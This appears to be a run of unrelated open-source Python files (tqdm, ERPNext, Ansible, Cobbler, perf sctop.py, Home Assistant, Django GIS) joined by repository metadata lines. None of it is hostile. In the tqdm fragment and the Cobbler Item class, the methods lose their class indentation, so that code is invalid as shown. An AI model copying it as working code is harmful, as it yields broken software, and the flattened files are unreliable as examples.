    if refresh:
        self.refresh()
def set_description_str(self, desc=None, refresh=True):
    """Set/modify description without ': ' appended."""
    if desc:
        self.desc = desc
    else:
        self.desc = ''
    if refresh:
        self.refresh()
def set_postfix(self, ordered_dict=None, refresh=True, **kwargs):
    """
    Set/modify postfix (additional stats)
    with automatic formatting based on datatype.

    Parameters
    ----------
    ordered_dict  : dict or OrderedDict, optional
    refresh  : bool, optional
        Forces refresh [default: True].
    kwargs  : dict, optional
        Extra key=value stats; merged after `ordered_dict`.
    """
    # Sort in alphabetical order to be more deterministic
    postfix = _OrderedDict([] if ordered_dict is None else ordered_dict)
    for key in sorted(kwargs.keys()):
        postfix[key] = kwargs[key]
    # Preprocess stats according to datatype
    for key in postfix.keys():
        # Number: limit the length of the string
        if isinstance(postfix[key], Number):
            postfix[key] = self.format_num(postfix[key])
        # Else for any other type, try to get the string conversion
        elif not isinstance(postfix[key], _basestring):
            postfix[key] = str(postfix[key])
        # Else if it's a string, don't need to preprocess anything
    # Stitch together to get the final postfix
    self.postfix = ', '.join(key + '=' + postfix[key].strip()
                             for key in postfix.keys())
    if refresh:
        self.refresh()
def set_postfix_str(self, s='', refresh=True):
    """
    Postfix without dictionary expansion, similar to prefix handling.
    """
    text = str(s)
    self.postfix = text
    if refresh:
        self.refresh()
def moveto(self, n):
    # TODO: private method
    # Move the terminal cursor n lines down (n > 0) or up (n < 0) so the
    # correct bar row is rewritten in multi-bar mode.
    self.fp.write(_unicode('\n' * n + _term_move_up() * -n))
    self.fp.flush()
@property
def format_dict(self):
    """Public API for read-only member access.

    Returns a plain dict snapshot of the bar state, suitable for
    ``format_meter(**snapshot)``.
    """
    snapshot = {
        'n': self.n,
        'total': self.total,
        'prefix': self.desc,
        'ascii': self.ascii,
        'unit': self.unit,
        'unit_scale': self.unit_scale,
        'bar_format': self.bar_format,
        'postfix': self.postfix,
        'unit_divisor': self.unit_divisor,
    }
    snapshot['elapsed'] = (self._time() - self.start_t
                           if hasattr(self, 'start_t') else 0)
    snapshot['ncols'] = (self.dynamic_ncols(self.fp)
                         if self.dynamic_ncols else self.ncols)
    snapshot['rate'] = 1 / self.avg_time if self.avg_time else None
    return snapshot
def display(self, msg=None, pos=None):
    """
    Use `self.sp` to display `msg` in the specified `pos`.

    Consider overloading this function when inheriting to use e.g.:
    `self.some_frontend(**self.format_dict)` instead of `self.sp`.

    Parameters
    ----------
    msg  : str, optional. What to display (default: `repr(self)`).
    pos  : int, optional. Position to `moveto`
      (default: `abs(self.pos)`).
    """
    offset = abs(self.pos) if pos is None else pos
    if offset:
        self.moveto(offset)
    text = self.__repr__() if msg is None else msg
    self.sp(text)
    if offset:
        self.moveto(-offset)
@classmethod
@contextmanager
def wrapattr(tclass, stream, method, total=None, bytes=True, **tkwargs):
    """
    Context manager yielding a wrapper around *stream* whose *method*
    reports progress through a new bar.

    stream  : file-like object.
    method  : str, "read" or "write". The result of `read()` and
        the first argument of `write()` should have a `len()`.

    >>> with tqdm.wrapattr(file_obj, "read", total=file_obj.size) as fobj:
    ...     while True:
    ...         chunk = fobj.read(chunk_size)
    ...         if not chunk:
    ...             break
    """
    with tclass(total=total, **tkwargs) as t:
        if bytes:
            # Byte-oriented defaults: B units, SI scaling, 1024 divisor.
            t.unit = "B"
            t.unit_scale = True
            t.unit_divisor = 1024
        yield CallbackIOWrapper(t.update, stream, method)
def trange(*args, **kwargs):
    """
    A shortcut for tqdm(xrange(*args), **kwargs).
    On Python3+ range is used instead of xrange.
    """
    # `_range` is the py2/py3-portable range alias defined at module level.
    return tqdm(_range(*args), **kwargs)
|
bsd-3-clause
|
mbauskar/omnitech-demo-erpnext
|
erpnext/setup/doctype/global_defaults/global_defaults.py
|
55
|
2227
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
"""Global Defaults"""
import frappe
import frappe.defaults
from frappe.utils import cint
from frappe.custom.doctype.property_setter.property_setter import make_property_setter
# Maps a key in frappe's defaults table to the corresponding field name on
# the Global Defaults doctype; iterated by GlobalDefaults.on_update().
keydict = {
    # "key in defaults": "key in Global Defaults"
    "fiscal_year": "current_fiscal_year",
    'company': 'default_company',
    'currency': 'default_currency',
    "country": "country",
    'hide_currency_symbol': 'hide_currency_symbol',
    'account_url': 'account_url',
    'disable_rounded_total': 'disable_rounded_total',
}
from frappe.model.document import Document
class GlobalDefaults(Document):
    """Controller for the singleton "Global Defaults" doctype.

    On save it pushes selected values into frappe's defaults table, enables
    the chosen default currency, and toggles rounded-total visibility on
    selling doctypes via property setters.
    """

    def on_update(self):
        """update defaults"""
        for key in keydict:
            frappe.db.set_default(key, self.get(keydict[key], ''))

        # update year start date and year end date from fiscal_year
        year_start_end_date = frappe.db.sql("""select year_start_date, year_end_date
            from `tabFiscal Year` where name=%s""", self.current_fiscal_year)

        if year_start_end_date:
            ysd = year_start_end_date[0][0] or ''
            yed = year_start_end_date[0][1] or ''
            if ysd and yed:
                frappe.db.set_default('year_start_date', ysd.strftime('%Y-%m-%d'))
                frappe.db.set_default('year_end_date', yed.strftime('%Y-%m-%d'))

        # enable default currency
        if self.default_currency:
            frappe.db.set_value("Currency", self.default_currency, "enabled", 1)

        self.toggle_rounded_total()

        # clear cache
        frappe.clear_cache()

    def get_defaults(self):
        # Thin wrapper exposing the merged defaults via this controller.
        return frappe.defaults.get_defaults()

    def toggle_rounded_total(self):
        # Normalise the checkbox value to 0/1 before writing property setters.
        self.disable_rounded_total = cint(self.disable_rounded_total)

        # Make property setters to hide rounded total fields
        for doctype in ("Quotation", "Sales Order", "Sales Invoice", "Delivery Note"):
            make_property_setter(doctype, "base_rounded_total", "hidden", self.disable_rounded_total, "Check")
            make_property_setter(doctype, "base_rounded_total", "print_hide", 1, "Check")
            make_property_setter(doctype, "rounded_total", "hidden", self.disable_rounded_total, "Check")
            make_property_setter(doctype, "rounded_total", "print_hide", self.disable_rounded_total, "Check")
|
agpl-3.0
|
quixoten/ansible
|
lib/ansible/plugins/inventory/aggregate.py
|
237
|
2266
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#############################################
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from . import InventoryParser
#from . ini import InventoryIniParser
#from . script import InventoryScriptParser
class InventoryAggregateParser(InventoryParser):
    """Aggregate hosts and groups from several inventory sources
    (files, directories, executable scripts, or literal hostnames).
    """

    def __init__(self, inven_sources):
        # BUGFIX: parse() iterates ``self.inven_sources`` but the original
        # stored the argument as ``self.inven_source``, so parse() always
        # raised AttributeError. Store under the name parse() reads, and
        # keep the old attribute as a backward-compatible alias for any
        # external readers.
        self.inven_sources = inven_sources
        self.inven_source = inven_sources  # deprecated alias
        self.hosts = dict()
        self.groups = dict()

    def reset_parser(self):
        """Reset parser state in the base class."""
        super(InventoryAggregateParser, self).reset_parser()

    def parse(self, refresh=False):
        # InventoryDirectoryParser is a InventoryAggregateParser so we avoid
        # a circular import by importing here.
        # BUGFIX: the original did ``from . directory import
        # InventoryAggregateParser`` (wrong name) and then referenced the
        # never-bound module name ``directory``; import the module itself so
        # ``directory.InventoryDirectoryParser`` below resolves.
        from . import directory

        if super(InventoryAggregateParser, self).parse(refresh):
            return self.parsed

        for entry in self.inven_sources:
            if os.path.sep in entry:
                # file or directory
                if os.path.isdir(entry):
                    parser = directory.InventoryDirectoryParser(filename=entry)
                elif utils.is_executable(entry):
                    # NOTE(review): ``utils``, ``InventoryScriptParser``,
                    # ``InventoryIniParser`` and ``HostnameParser`` are not
                    # imported in this module (pre-existing); confirm their
                    # intended import sites before relying on these branches.
                    parser = InventoryScriptParser(filename=entry)
                else:
                    parser = InventoryIniParser(filename=entry)
            else:
                # hostname
                parser = HostnameParser(hostname=entry)
            hosts, groups = parser.parse()
            self._merge(self.hosts, hosts)
            self._merge(self.groups, groups)
|
gpl-3.0
|
jmaas/cobbler
|
cobbler/items/item.py
|
1
|
18656
|
"""
Copyright 2006-2009, Red Hat, Inc and Others
Michael DeHaan <michael.dehaan AT gmail>
This software may be freely redistributed under the terms of the GNU
general public license.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA.
"""
from builtins import object
from builtins import str
import fnmatch
import pprint
from cobbler import utils
from cobbler import validate
from cobbler.cexceptions import CX, NotImplementedException
from cobbler.utils import _
# the fields has controls what data elements are part of each object. To add a new field, just add a new
# entry to the list following some conventions to be described later. You must also add a method called
# set_$fieldname. Do not write a method called get_$fieldname, that will not be called.
#
# name | default | subobject default | display name | editable? | tooltip | values ? | type
#
# name -- what the field should be called. For the command line, underscores will be replaced with
# a hyphen programmatically, so use underscores to separate things that are separate words
#
# default value -- when a new object is created, what is the default value for this field?
#
# subobject default -- this applies ONLY to subprofiles, and is most always set to <<inherit>>. If this
# is not item_profile.py it does not matter.
#
# display name -- how the field shows up in the web application and the "cobbler report" command
#
# editable -- should the field be editable in the CLI and web app? Almost always yes unless
# it is an internalism. Fields that are not editable are "hidden"
#
# tooltip -- the caption to be shown in the web app or in "commandname --help" in the CLI
#
# values -- for fields that have a limited set of valid options and those options are always fixed
# (such as architecture type), the list of valid options goes in this field.
#
# type -- the type of the field. Used to determine which HTML form widget is used in the web interface
#
#
# the order in which the fields appear in the web application (for all non-hidden
# fields) is defined in field_ui_info.py. The CLI sorts fields alphabetically.
#
# field_ui_info.py also contains a set of "Groups" that describe what other fields
# are associated with what other fields. This affects color coding and other
# display hints. If you add a field, please edit field_ui_info.py carefully to match.
#
# additional: see field_ui_info.py for some display hints. By default, in the
# web app, all fields are text fields unless field_ui_info.py lists the field in
# one of those dictionaries.
#
# hidden fields should not be added without just cause, explanations about these are:
#
# ctime, mtime -- times the object was modified, used internally by cobbler for API purposes
# uid -- also used for some external API purposes
# source_repos -- an artifact of import, this is too complicated to explain on IRC so we just hide it
# for RHEL split repos, this is a list of each of them in the install tree, used to generate
# repo lines in the automatic installation file to allow installation of x>=RHEL5. Otherwise unimportant.
# depth -- used for "cobbler list" to print the tree, makes it easier to load objects from disk also
# tree_build_time -- loaded from import, this is not useful to many folks so we just hide it. Avail over API.
#
# so to add new fields
# (A) understand the above
# (B) add a field below
# (C) add a set_fieldname method
# (D) if field must be viewable/editable via web UI, add a entry in
# corresponding *_UI_FIELDS_MAPPING dictionary in field_ui_info.py.
# If field must not be displayed in a text field in web UI, also add
# an entry in corresponding USES_* list in field_ui_info.py.
#
# in general the set_field_name method should raise exceptions on invalid fields, always. There are adtl
# validation fields in is_valid to check to see that two seperate fields do not conflict, but in general
# design issues that require this should be avoided forever more, and there are few exceptions. Cobbler
# must operate as normal with the default value for all fields and not choke on the default values.
class Item(object):
"""
An Item is a serializable thing that can appear in a Collection
"""
# Per-COLLECTION_TYPE cache of serialized (dict) item representations,
# keyed by item name; see to_dict() for the producer.
converted_cache = {}

@classmethod
def get_from_cache(cls, ref):
    """Return the cached dict for *ref*, or None if it was never cached."""
    return cls.converted_cache.get(ref.COLLECTION_TYPE, {}).get(ref.name)

@classmethod
def set_cache(cls, ref, value):
    """Store *value* as the cached serialized form of *ref*."""
    if ref.COLLECTION_TYPE not in cls.converted_cache:
        cls.converted_cache[ref.COLLECTION_TYPE] = {}
    cls.converted_cache[ref.COLLECTION_TYPE][ref.name] = value

@classmethod
def remove_from_cache(cls, ref):
    """Drop *ref* from the cache; silently a no-op if absent."""
    cls.converted_cache.get(ref.COLLECTION_TYPE, {}).pop(ref.name, None)

# Overridden by concrete item subclasses (distro, profile, system, ...).
TYPE_NAME = "generic"
def __init__(self, collection_mgr, is_subobject=False):
    """
    Constructor.  Requires a back reference to the CollectionManager object.

    NOTE: is_subobject is used for objects that allow inheritance in their trees.  This
    inheritance refers to conceptual inheritance, not Python inheritance.  Objects created
    with is_subobject need to call their set_parent() method immediately after creation
    and pass in a value of an object of the same type.  Currently this is only supported
    for profiles.  Subobjects blend their data with their parent objects and only require
    a valid parent name and a name for themselves, so other required options can be
    gathered from items further up the cobbler tree.

    distro
        profile
            profile  <-- created with is_subobject=True
                system   <-- created as normal

    For consistancy, there is some code supporting this in all object types, though it is only usable
    (and only should be used) for profiles at this time.  Objects that are children of
    objects of the same type (i.e. subprofiles) need to pass this in as True.  Otherwise, just
    use False for is_subobject and the parent object will (therefore) have a different type.
    """
    self.collection_mgr = collection_mgr
    self.settings = self.collection_mgr._settings
    self.clear(is_subobject)        # reset behavior differs for inheritance cases
    self.parent = ''                # all objects by default are not subobjects
    self.children = {}              # caching for performance reasons, not serialized
    self.log_func = self.collection_mgr.api.log
    self.ctime = 0                  # to be filled in by collection class
    self.mtime = 0                  # to be filled in by collection class
    self.uid = ""                   # to be filled in by collection class
    # Field containers; populated later via set_* methods / clear().
    self.kernel_options = None
    self.kernel_options_post = None
    self.autoinstall_meta = None
    self.fetchable_files = None
    self.boot_files = None
    self.template_files = None
    self.name = None
    # Serialization cache bookkeeping (see to_dict()).
    self.last_cached_mtime = 0
    self.cached_dict = ""
def __find_compare(self, from_search, from_obj):
    """
    Compare a search criterion against an object field value.

    Strings use case-insensitive equality, or fnmatch globbing when the
    pattern contains wildcard characters.  Lists match when every searched
    element is present; dicts match when every searched key/value pair is
    present; bools match against common truthy spellings.  Raises CX for
    field types it cannot compare.
    """
    if isinstance(from_obj, str):
        # FIXME: fnmatch is only used for string to string comparisions
        # which should cover most major usage, if not, this deserves fixing
        from_obj_lower = from_obj.lower()
        from_search_lower = from_search.lower()
        # it's much faster to not use fnmatch if it's not needed
        if '?' not in from_search_lower and '*' not in from_search_lower and '[' not in from_search_lower:
            match = from_obj_lower == from_search_lower
        else:
            match = fnmatch.fnmatch(from_obj_lower, from_search_lower)
        return match
    else:
        if isinstance(from_search, str):
            if isinstance(from_obj, list):
                from_search = utils.input_string_or_list(from_search)
                # every searched element must be present in the object's list
                for x in from_search:
                    if x not in from_obj:
                        return False
                return True
            if isinstance(from_obj, dict):
                (junk, from_search) = utils.input_string_or_dict(from_search, allow_multiples=True)
                # every searched key must exist with an equal value
                for x in list(from_search.keys()):
                    y = from_search[x]
                    if x not in from_obj:
                        return False
                    if not (y == from_obj[x]):
                        return False
                return True
            if isinstance(from_obj, bool):
                if from_search.lower() in ["true", "1", "y", "yes"]:
                    inp = True
                else:
                    inp = False
                if inp == from_obj:
                    return True
                return False
        raise CX(_("find cannot compare type: %s") % type(from_obj))
def get_fields(self):
    """
    Get serializable fields.

    Must be defined in any subclass; the base implementation always raises.
    """
    raise NotImplementedException()
def clear(self, is_subobject=False):
    """
    Reset this object's attributes to the defaults declared by get_fields().
    Subobjects (conceptual inheritance) get different reset behavior.
    """
    utils.clear_from_fields(self, self.get_fields(), is_subobject=is_subobject)
def make_clone(self):
    """
    Return a copy of this object.  Must be defined in any subclass.
    """
    raise NotImplementedException()
def from_dict(self, _dict):
    """
    Modify this object to take on the field values found in *_dict*.
    """
    utils.from_dict_from_fields(self, _dict, self.get_fields())
def to_dict(self):
    """
    Return this object serialized to a dict, using the class-level converted
    cache to avoid repeated field conversion.
    """
    value = self.get_from_cache(self)
    if value is None:
        # cache miss: convert the declared fields and remember the result
        value = utils.to_dict_from_fields(self, self.get_fields())
        self.set_cache(self, value)
    return value
def to_string(self):
    """Return a printable rendering of this object's fields."""
    return utils.to_string_from_fields(self, self.get_fields())

def get_setter_methods(self):
    """Return the setter methods derived from this item's field list (see utils)."""
    return utils.get_setter_methods_from_fields(self, self.get_fields())

def set_uid(self, uid):
    # Unique id; assigned by the owning collection class.
    self.uid = uid
def get_children(self, sorted=True):
    """
    Return the direct children of this object, in name order by default.
    (The parameter name `sorted` shadows the builtin; kept for API compatibility.)
    """
    names = list(self.children.keys())
    if sorted:
        names.sort()
    return [self.children[name] for name in names]
def get_descendants(self, sort=False):
    """
    Return the objects that depend on this object, i.e. those that would be
    affected by a cascading delete.  With sort=True the result is a walk of
    the tree (e.g. distro -> [profile, sys, sys, profile, sys, sys]); with
    sort=False all direct children come first, then their descendants.
    """
    children = self.get_children(sorted=sort)
    results = [] if sort else list(children)
    for child in children:
        if sort:
            results.append(child)
        results.extend(child.get_descendants(sort=sort))
    return results
def get_parent(self):
    """
    For objects with a tree relationship, return the parent object.
    Base implementation: items have no parent.
    """
    return None
def get_conceptual_parent(self):
    """
    The parent may just be a superclass for something like a subprofile.
    Walk up the tree and return the first ancestor of a *different* type,
    or None.

    NOTE(review): self.conceptual_parent is only assigned when such an
    ancestor is found; callers should not rely on the attribute otherwise.
    """
    mtype = type(self)
    parent = self.get_parent()
    while parent is not None:
        ptype = type(parent)
        if mtype != ptype:
            self.conceptual_parent = parent
            return parent
        parent = parent.get_parent()
    return None
def set_name(self, name):
    """
    Validate and set the object's name.

    @param: str name (object name string)
    @raises: an exception from validate.object_name() if the name is invalid
    """
    self.name = validate.object_name(name, self.parent)
def set_comment(self, comment):
    """Attach a free-form comment string; None is normalized to ""."""
    self.comment = "" if comment is None else comment
def set_owners(self, data):
    """
    The owners field is a comment unless using an authz module that pays
    attention to it, like authz_ownership, which ships with Cobbler but is
    off by default.  Accepts a string or list; stored as a list.
    """
    self.owners = utils.input_string_or_list(data)
def set_kernel_options(self, options):
    """
    Kernel options are a space delimited list, like 'a=b c=d e=f g h i=j'
    or a dict.

    @raises: CX when the input cannot be parsed
    """
    (success, value) = utils.input_string_or_dict(options, allow_multiples=True)
    if not success:
        raise CX(_("invalid kernel options"))
    else:
        self.kernel_options = value
def set_kernel_options_post(self, options):
    """
    Post (post-install) kernel options are a space delimited list, like
    'a=b c=d e=f g h i=j' or a dict.

    @raises: CX when the input cannot be parsed
    """
    (success, value) = utils.input_string_or_dict(options, allow_multiples=True)
    if not success:
        raise CX(_("invalid post kernel options"))
    else:
        self.kernel_options_post = value
def set_autoinstall_meta(self, options):
    """
    A comma delimited list of key value pairs, like 'a=b,c=d,e=f' or a dict.
    The meta tags are used as input to the templating system to preprocess
    automatic installation template files.

    NOTE(review): unlike set_kernel_options(), this returns False on bad
    input instead of raising CX; callers must check the return value.
    """
    (success, value) = utils.input_string_or_dict(options, allow_multiples=True)
    if not success:
        return False
    else:
        self.autoinstall_meta = value
def set_mgmt_classes(self, mgmt_classes):
    """
    Assigns a list of configuration management classes that can be assigned
    to any object, such as those used by Puppet's external_nodes feature.
    Accepts a string or list; stored as a list.

    Fix: the previous code ran utils.input_string_or_dict's list conversion
    twice over the same value; the conversion is idempotent, so a single
    call is sufficient.
    """
    self.mgmt_classes = utils.input_string_or_list(mgmt_classes)
def set_mgmt_parameters(self, mgmt_parameters):
    """
    A YAML string which can be assigned to any object, used by Puppet's
    external_nodes feature.

    The literal "<<inherit>>" is stored verbatim so profile inheritance can
    resolve it later; anything else must parse to a dictionary.

    @raises: CX when the YAML does not evaluate to a dict
    """
    if mgmt_parameters == "<<inherit>>":
        self.mgmt_parameters = mgmt_parameters
    else:
        import yaml
        data = yaml.safe_load(mgmt_parameters)
        # isinstance instead of `type(...) is not dict` also accepts
        # dict subclasses (e.g. OrderedDict) -- backward compatible.
        if not isinstance(data, dict):
            raise CX(_("Input YAML in Puppet Parameter field must evaluate to a dictionary."))
        self.mgmt_parameters = data
def set_template_files(self, template_files):
    """
    A comma separated list of source=destination templates that should be
    generated during a sync.

    NOTE(review): returns False on bad input rather than raising.
    """
    (success, value) = utils.input_string_or_dict(template_files, allow_multiples=False)
    if not success:
        return False
    else:
        self.template_files = value
def set_boot_files(self, boot_files):
    """
    A comma separated list of req_name=source_file_path entries that should
    be fetchable via tftp.

    NOTE(review): returns False on bad input rather than raising.
    """
    (success, value) = utils.input_string_or_dict(boot_files, allow_multiples=False)
    if not success:
        return False
    else:
        self.boot_files = value
def set_fetchable_files(self, fetchable_files):
    """
    A comma separated list of virt_name=path_to_template entries that should
    be fetchable via tftp or a webserver.

    NOTE(review): returns False on bad input rather than raising.
    """
    (success, value) = utils.input_string_or_dict(fetchable_files, allow_multiples=False)
    if not success:
        return False
    else:
        self.fetchable_files = value
def sort_key(self, sort_fields=None):
    """
    Return the values of *sort_fields* from this object's dict form, suitable
    for use as a sort key.  Fields missing from the dict sort as "".

    Fix: the previous signature used a mutable default argument ([]); the
    default is now None, which behaves identically for callers.
    """
    data = self.to_dict()
    return [data.get(field, "") for field in (sort_fields or [])]
def find_match(self, kwargs, no_errors=False):
    """
    Return True if this object satisfies every key/value criterion in
    *kwargs*.  Used by the find() method in collection.py.

    A string value starting with "~" negates its comparison.  Fix: the old
    code called value.startswith() on any non-None value, which raised
    AttributeError for non-string criteria (e.g. ints); those are now
    compared directly.
    """
    data = self.to_dict()
    for (key, value) in list(kwargs.items()):
        # Allow ~ to negate the compare, but only for string criteria.
        if isinstance(value, str) and value.startswith("~"):
            res = not self.find_match_single_key(data, key, value[1:], no_errors)
        else:
            res = self.find_match_single_key(data, key, value, no_errors)
        if not res:
            return False
    return True
def find_match_single_key(self, data, key, value, no_errors=False):
    """
    Return True if *data* (this object's dict form) satisfies one key/value
    search criterion.

    System objects are special-cased: per-NIC fields are searched across
    every entry of data["interfaces"], and a value equal to an interface
    *name* also counts as a match.
    """
    # special case for systems
    key_found_already = False
    if "interfaces" in data:
        if key in ["mac_address", "ip_address", "netmask", "virt_bridge",
                   "dhcp_tag", "dns_name", "static_routes", "interface_type",
                   "interface_master", "bonding_opts", "bridge_opts",
                   "interface"]:
            key_found_already = True
            for (name, interface) in list(data["interfaces"].items()):
                if value == name:
                    return True
                if value is not None and key in interface:
                    if self.__find_compare(interface[key], value):
                        return True
    if key not in data:
        if not key_found_already:
            if not no_errors:
                # FIXME: removed for 2.0 code, shouldn't cause any problems to not have an exception here?
                # raise CX(_("searching for field that does not exist: %s" % key))
                return False
        else:
            if value is not None:  # FIXME: new?
                return False
            if value is None:
                return True
    else:
        if value is None:
            # a None criterion matches any present key
            return True
        else:
            return self.__find_compare(value, data[key])
def dump_vars(self, data, format=True):
    """
    Return the fully blended variable set for this object.

    @param: data (unused here; kept for API compatibility)
    @param: format - when True return a pretty-printed string, else the raw dict
    (the `format` parameter shadows the builtin; name kept to preserve the interface)
    """
    raw = utils.blender(self.collection_mgr.api, False, self)
    if format:
        return pprint.pformat(raw)
    else:
        return raw
def set_depth(self, depth):
    # Tree-depth bookkeeping used by the collection classes.
    self.depth = depth

def set_ctime(self, ctime):
    # Creation timestamp; filled in by the owning collection.
    self.ctime = ctime

def set_mtime(self, mtime):
    # Last-modified timestamp; filled in by the owning collection.
    self.mtime = mtime

def set_parent(self, parent):
    # Parent object name, for tree-structured object types.
    self.parent = parent
def check_if_valid(self):
    """
    Raise exceptions if the object state is inconsistent.
    Currently only verifies that a name has been assigned.
    """
    if not self.name:
        raise CX("Name is required")
# EOF
|
gpl-2.0
|
inteos/IBAdmin
|
restore/models.py
|
1
|
1062
|
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2015-2019 by Inteos Sp. z o.o.
# All rights reserved. See LICENSE file for details.
#
from __future__ import unicode_literals
from django.db import models
"""
class Permissions(models.Model):
class Meta:
managed = False
permissions = (
('restore_jobs', 'Can restore jobs'),
('restore_jobs', 'Can add files jobs'),
('change_jobs', 'Can change jobs'),
('advanced_jobs', 'Can change jobs advanced'),
('delete_jobs', 'Can delete jobs'),
('run_jobs', 'Can run jobs'),
('restore_jobs', 'Can restore jobs'),
('cancel_jobs', 'Can cancel running jobs'),
('stop_jobs', 'Can stop running jobs'),
('restart_jobs', 'Can restart failed jobs'),
('comment_jobs', 'Can comment jobs'),
('view_datalocation', 'Can view jobs data location'),
('delete_jobid', 'Can delete jobs history'),
('status_jobs', 'Can view running job status'),
)
"""
|
agpl-3.0
|
daivietpda/sense-l
|
tools/perf/scripts/python/sctop.py
|
11180
|
1924
|
# system call top
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
# perf passes extra CLI args through to the script: [comm] [interval]
usage = "perf script -s sctop.py [comm] [interval]\n";

for_comm = None           # if set, only syscalls made by this command are counted
default_interval = 3      # seconds between display refreshes
interval = default_interval

if len(sys.argv) > 3:
    sys.exit(usage)

if len(sys.argv) > 2:
    for_comm = sys.argv[1]
    interval = int(sys.argv[2])
elif len(sys.argv) > 1:
    try:
        # a single argument may be either an interval (number) or a comm name
        interval = int(sys.argv[1])
    except ValueError:
        for_comm = sys.argv[1]
        interval = default_interval

# per-syscall-id event counters (autodict comes from Perf-Trace-Util's Core)
syscalls = autodict()
def trace_begin():
    # Called once by perf before events arrive: spawn the display-refresh
    # loop in a background thread (Python 2 "thread" module); perf drives
    # the main thread with trace events.
    thread.start_new_thread(print_syscall_totals, (interval,))
    pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        id, args):
    # Per-event callback invoked by perf for every syscall entry.
    if for_comm is not None:
        if common_comm != for_comm:
            return
    # autodict leaves are created lazily; the first increment of a new id
    # raises TypeError, so seed the counter with 1 in that case.
    try:
        syscalls[id] += 1
    except TypeError:
        syscalls[id] = 1
def print_syscall_totals(interval):
    # Runs forever in a background thread: clear the terminal and redraw the
    # per-syscall counts every `interval` seconds, highest count first, then
    # reset the counters.  (Python 2 print-statement syntax; the trailing
    # commas suppress newlines.)
    while 1:
        clear_term()
        if for_comm is not None:
            print "\nsyscall events for %s:\n\n" % (for_comm),
        else:
            print "\nsyscall events:\n\n",
        print "%-40s %10s\n" % ("event", "count"),
        print "%-40s %10s\n" % ("----------------------------------------", \
                                "----------"),
        for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
                              reverse = True):
            try:
                # syscall_name may fail for unknown ids; skip those rows
                print "%-40s %10d\n" % (syscall_name(id), val),
            except TypeError:
                pass
        syscalls.clear()
        time.sleep(interval)
|
gpl-2.0
|
revpoint/prefs-n-perms
|
prefs_n_perms/sections.py
|
1
|
1192
|
from prefs_n_perms.client import db
from prefs_n_perms.permissions import Permissions
from prefs_n_perms.preferences import Preferences
from prefs_n_perms.settings import preference_settings
class Section(object):
    """
    A named preferences/permissions namespace stored in the backing
    key-value store (the `db` client).

    The storage key is "<SECTIONS_PREFIX>:<name>", and its value is the
    list of tier names for the section.
    """
    prefix = preference_settings.SECTIONS_PREFIX

    def __init__(self, name, **kwargs):
        # NOTE(review): extra keyword arguments are accepted and ignored.
        self.name = name

    def __str__(self):
        return self.name

    @property
    def section_key(self):
        # Full storage key for this section, e.g. "<prefix>:<name>".
        return ':'.join((self.prefix, self.name))

    def exists(self):
        """True if this section has been persisted to the store."""
        return self.section_key in db

    @property
    def has_preferences(self):
        return Preferences(self).exists()

    @property
    def has_permissions(self):
        return Permissions(self).exists()

    def get_preferences(self, **kwargs):
        """Return a Preferences accessor bound to this section."""
        return Preferences(self, **kwargs)

    def get_permissions(self, **kwargs):
        """Return a Permissions accessor bound to this section."""
        return Permissions(self, **kwargs)

    @property
    def tiers(self):
        # Lazy list wrapper over the stored tier names.
        return db.List(self.section_key)

    @tiers.setter
    def tiers(self, value):
        if not isinstance(value, (tuple, list)):
            raise ValueError
        # replace any existing tier list wholesale
        if self.exists():
            db.api.delete(self.section_key)
        db.List(self.section_key, value)
|
mit
|
adrienbrault/home-assistant
|
tests/components/trace/test_utils.py
|
2
|
1169
|
"""Test trace helpers."""
from datetime import timedelta
from homeassistant import core
from homeassistant.components import trace
from homeassistant.util import dt as dt_util
def test_json_encoder(hass):
    """Test the Trace JSON Encoder."""
    ha_json_enc = trace.utils.TraceJSONEncoder()
    state = core.State("test.test", "hello")

    # Test serializing a datetime
    now = dt_util.utcnow()
    assert ha_json_enc.default(now) == now.isoformat()

    # Test serializing a timedelta
    data = timedelta(
        days=50,
        seconds=27,
        microseconds=10,
        milliseconds=29000,
        minutes=5,
        hours=8,
        weeks=2,
    )
    assert ha_json_enc.default(data) == {
        "__type": str(type(data)),
        "total_seconds": data.total_seconds(),
    }

    # Test serializing a set()
    data = {"milk", "beer"}
    assert sorted(ha_json_enc.default(data)) == sorted(data)

    # Test serializing an object which implements as_dict
    assert ha_json_enc.default(state) == state.as_dict()

    # Default method falls back to repr(o)
    o = object()
    assert ha_json_enc.default(o) == {"__type": str(type(o)), "repr": repr(o)}
|
mit
|
bfirsh/django-old
|
django/contrib/gis/db/models/sql/query.py
|
379
|
5314
|
from django.db import connections
from django.db.models.query import sql
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import aggregates as gis_aggregates
from django.contrib.gis.db.models.sql.conversion import AreaField, DistanceField, GeomField
from django.contrib.gis.db.models.sql.where import GeoWhereNode
from django.contrib.gis.geometry.backend import Geometry
from django.contrib.gis.measure import Area, Distance
# Lookup terms supported by the spatial backends, merged with the core ORM's
# QUERY_TERMS.  dict.fromkeys() (values default to None) replaces the old
# dict([(x, None) for x in ...]) idiom with the same resulting mapping.
ALL_TERMS = dict.fromkeys((
